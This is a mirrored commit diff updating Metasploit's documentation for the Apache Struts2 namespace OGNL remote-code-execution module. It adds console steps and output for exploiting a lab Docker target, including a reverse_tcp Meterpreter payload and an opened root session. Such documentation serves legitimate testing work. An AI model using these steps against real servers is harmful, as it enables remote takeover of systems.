infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Documentation update

GSoC/Meterpreter_Web_Console
asoto-r7 2018-08-31 13:57:41 -05:00
parent 8fe8bf62e3
commit da7a29f715
No known key found for this signature in database
GPG Key ID: F531810B7FE55396
1 changed files with 28 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
documentation/modules/exploit/multi/http/struts_namespace_rce.md → documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
View File

@ -50,6 +50,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
``` ```
8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint: 8. Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
``` ```
sudo docker start $CONTAINER_ID sudo docker start $CONTAINER_ID
``` ```
@ -83,7 +84,10 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
- [ ] You will not be given a shell (yet). - [ ] You will not be given a shell (yet).
Confirm that payload upload and execution works: Confirm that payload upload and execution works:
- [ ] It doesn't (yet). - [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp```
- [ ] Configure `LHOST` and `RHOST` as necessary.
- [ ] Run the exploit: ```run```
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
## Options ## Options
**TARGETURI** **TARGETURI**
@ -98,7 +102,7 @@ The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 20
### Version of software and OS as applicable ### Version of software and OS as applicable
Checking a vulnerable endpoint, as installed in the above steps. Checking a vulnerable endpoint, as installed in the above steps:
``` ```
msf > use exploit/multi/http/struts_namespace_rce msf > use exploit/multi/http/struts_namespace_rce
@ -127,3 +131,25 @@ b3d9b350d9b6
[*] Exploit completed, but no session was created. [*] Exploit completed, but no session was created.
msf5 exploit(multi/http/struts_namespace_rce) > msf5 exploit(multi/http/struts_namespace_rce) >
``` ```
Getting a Meterpreter session on the above-described environment:
```
msf5 > use exploit/multi/http/struts2_namespace_ognl
msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action
msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
msf5 exploit(multi/http/struts2_namespace_ognl) > run
[*] Started reverse TCP handler on 192.168.199.134:4444
[+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root
[+] Payload successfully dropped and executed.
[*] Sending stage (816260 bytes) to 192.168.199.135
[*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500
meterpreter >
```